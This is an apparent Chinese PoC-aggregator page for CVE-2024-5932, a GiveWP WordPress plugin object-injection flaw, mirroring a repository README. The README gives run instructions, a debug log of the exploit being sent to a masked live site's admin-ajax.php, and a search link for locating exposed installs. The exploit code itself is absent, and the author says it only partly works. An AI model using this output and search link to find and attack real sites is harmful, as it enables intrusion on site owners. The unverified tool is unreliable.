关联漏洞
标题:
WordPress plugin GiveWP 安全漏洞
(CVE-2024-5932)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin GiveWP 3.14.1版本及之前版本存在安全漏洞。攻击者利用该漏洞可以远程执行代码并删除任意文件。
描述
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
介绍
# CVE-2024-5932-PoC
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
# ⚠️⚠️Kinda works but doesn't. Need Help⚠️⚠️
# Usage
```sh
python3 exploit.py
```
The script will ask you to set the target URL and the URL where the Donation form is located.
```sh
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Enter the target domain (e.g., example.com):
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form):
```
# Output
```sh
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Please enter the domain (e.g., example.com): xxxxxxxx.org
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form): https://xxxxxxxx.org/donations/donation-form/2024-08-22 15:16:52,154 - DEBUG - Attempting to access: https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,156 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:52,580 - DEBUG - https://xxxxxxxx.org:443 "GET /donations/donation-form/ HTTP/1.1" 200 17518
2024-08-22 15:16:52,709 - DEBUG - Received response with status code: 200
2024-08-22 15:16:52,721 - DEBUG - Searching for donation form in the page HTML...
2024-08-22 15:16:52,722 - DEBUG - Donation form found.
2024-08-22 15:16:52,723 - DEBUG - Payload prepared successfully.
2024-08-22 15:16:52,723 - INFO - Sending exploit to https://xxxxxxxx.org/wp-admin/admin-ajax.php...
2024-08-22 15:16:52,723 - DEBUG - Preparing payload...
2024-08-22 15:16:52,724 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:54,462 - DEBUG - https://xxxxxxxx.org:443 "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 None
2024-08-22 15:16:54,462 - DEBUG - Exploit response status code: 200
2024-08-22 15:16:54,462 - INFO - Exploit sent successfully!
```
# Hunter Search
https://hunter.how/list?searchValue=web.body%3D%22%2Fwp-content%2Fplugins%2Fgive%22
# DISCLAIMER:
This script is provided for educational and research purposes only. The intent of this tool is to help security researchers and penetration testers identify vulnerabilities in systems that they have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
By using this script, you agree to take full responsibility for any actions performed with it. The author and contributors to this script are not responsible for any damages or legal consequences that may arise from its use. Ensure that you have proper authorization before testing any systems with this tool.
Use this tool responsibly and only on systems for which you have explicit permission to perform security testing.
If you are unsure about the legality of your actions, consult with a legal professional before proceeding.
文件快照
[4.0K] /data/pocs/3904fe821d9bc5f0b0801dc686af356fe03f2d0d
├── [4.2K] exploit.py
├── [1.0K] LICENSE
└── [2.7K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。